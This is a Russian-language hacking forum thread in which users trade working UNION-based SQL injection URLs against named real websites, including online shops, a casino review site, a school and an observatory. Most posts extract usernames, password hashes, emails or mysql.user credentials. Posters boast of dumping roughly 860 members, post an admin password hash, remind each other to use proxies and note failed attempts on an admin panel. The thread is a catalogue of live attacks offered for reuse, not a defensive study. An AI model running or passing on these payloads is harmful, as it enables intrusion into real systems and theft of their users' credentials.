SQL Инъекции

мм

Code:

http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+admin/*

 

молодец, я как-то пропустил))
все гениальное - просто)
не как моя следующая инъекция)) пришлось качать smf, чтоб посмотреть названия колонок и таблиц в install.sql

Code:

http://www.dsrevolution.com/article.php?articleid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,0x3a,passwd,0x3a,emailAddress),9,10,11,12,13,14+from+smf_members+limit+0,1/*

860±10 мемберов
login:рass:mail

 

Какой то магазинчик, вытянул мыло и пароль, собственно там это и нужно:

Code:

http://dvd.multi-m.ru/category/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(email,char(58),pwd),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users/*

Code:

http://buks.ru/book/?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Не забываем пользоваться проксями!

 

А ктото в казино играть любит? =)

Люблю v4 зато что большая вероятность таблици user\users\admin\admins, но терпеть немогу её за то, что если эти таблици не подходят подобрать сложно, люблю v5 зато что можно с большой вероятностью вычислить нужную таблицу, но нелюблю её за такой гемор. =)

Code:

http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

 

А еще лицей информационных технологий....
Куда катимся?...

Code:

http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6/*&cont=news

 

Code:

http://www.hrmi.lt/news.php?strid=1010&id=-4039+union+select+1,password,username,4,5,6,7,8,9+from+users/*

admin:9a997d8da071c76edc7aa3e9a89b251d

Code:

http://www.galiugyventi.lt/news.php?strid=1034&id=-1+union+select+1,password,username,4,5,6,7,8,9,0,1,2,3,4+from+users/*

он же
admin:9a997d8da071c76edc7aa3e9a89b251d

 

Code:

http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+1,2,3,concat(username,0x3a,password),5,6,7+from+users/*

может это уже было?

 

=\

 

Было, и не раз.
____________
Скули:
Какойто магазин:

Колготки и чулки :

И еще один шоп с 5-ой скулей))):

 

__

 

я ужо постил), тут кажись некоторые ссылки раз по 5 повторяются, если не больше.

Code:

http://www.jobs.ge/index.php?ur=job&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,USER(),4,5,6,7,8/*

 

Code:

http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

 

Code:

http://www.stroyrt.ru/index.php?page=news&newsid=-1+union+select+1,concat(login,char(58),passwd),3,4+from+users+limit+1,1/*

 

Code:

http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,convert(соncat(user,сhаr(58),pаsswоrd),char),6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*

моё кунг фу сильнее твоего =)

http://www.dailycal.org/admin/ нет доступа =(

 

Code:

http://www.kvalitet.com.ua/shop/new.php?ID=-36%20UNION%20SELECT%201,2,3,4+from+news/*

Code:

http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*

выборка с таблицы users возможна
и это еще не конец((

Code:

http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3

-вылетает
коммент (You have an error in your SQL syntax; check the manual .......) че за нах?

 

college.ru

Code:

http://www.college.ru/modules.php?name=Teacher&param=viewlink&cid=-1+union+select+1,2,3,4,5/*

не смог подобрать таблицу юзеров) версия 4, фильтация скобок в запросах...(

Code:

http://www.voinenet.ru/index.php?aid=-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/*

к mysql.user доступа нет.
зато версия 5

 

http://www.mks-ks.ru/shop/cat.php?id=-4+union+select+1,2,3,convert(version()+using+cp1251)/*

 

все ценим мою скулю
знаков много, будут пробелы.

Code:

http://www.m16.ru/shop/index.php?page=model&id=-30+union+select+1,char(241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,233,32,237,238,243,242),3,char(40,236,238,228,229,235,252,32,92,34,243,240,243,240,243,92,34,41),5,6,char(237,232,232,239,224,246,224,32,241,234,238,235,252,234,238,32),8,9,char(205,238,226,224,255,32,236,238,228,229,235,252,32,241,243,239,229,240,45,236,229,227,224,32,234,240,243,242,238,227,238,32,237,238,243,242,224,32,211,208,211,208,211,32,239,238,236,238,230,229,242,32,226,224,236,32,226,32,242,224,234,238,236,32,237,229,235,184,227,234,238,236,32,228,229,235,229,32,234,224,234,32,213,221,202,46,32,206,242,235,232,247,232,242,232,235,252,237,238,32,238,241,238,225,229,237,237,238,241,242,252,254,32,228,224,237,237,238,233,32,236,238,228,229,235,232,32,255,226,235,255,229,242,241,255,32,236,232,245,224,237,232,231,236,32,240,224,231,225,232,226,224,237,232,255,32,234,224,236,237,229,233,32,232,32,226,251,231,238,226,32,232,231,32,227,235,243,225,232,237,32,238,234,229,224,237,224,32,241,224,236,238,227,238,32,202,242,243,235,245,243),char(208,250,235,252,255,245),150,5,char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(237,232,234,224,234,238,227,238,32,237,224,245,229,240,32,239,240,238,246,229,241,241,238,240,224),char(245,231),char(51,50,32,234,225),0,char(207,238,228,228,229,240,230,234,224,32,240,224,231,240,229,248,229,237,232,255,32,49,120,49,32,112,105,99,115),50000,char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),char(237,229,242),char(236,238,228,229,236,32,241,238,32,241,234,238,240,238,241,242,252,254,32,57,57,57,32,71,98,105,116,47,115),char(237,232,245,240,229,237,224,32,238,237,32,237,229,32,247,232,242,224,229,242),0,1400000,char(239,238,230,232,231,229,237,237,238,32,237,224,245),char(77,83,45,68,79,83),char(239,224,235,252,247,229,234,238,226,224,255),char(221,242,238,242,32,237,238,243,242,225,243,234,32,226,251,32,236,238,230,229,242,229,32,234,243,239,232,242,252,32,243,32,83,112,121,100,101,114,92,39,97,46,32,65,78,84,73,67,72,65,84,32,82,117,108,101,115,33,33,33)

 

www.keckobservatory.org


Колонку не подобрал =(

Code:

http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(version(),char),3,4,5,6,7,8+from+mysql.user/*

 

http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(concat(user,char(58),password),char),3,4,5,6,7,8+from+mysql.user+limit+0,1/*

Элементарно, правда пасса нет((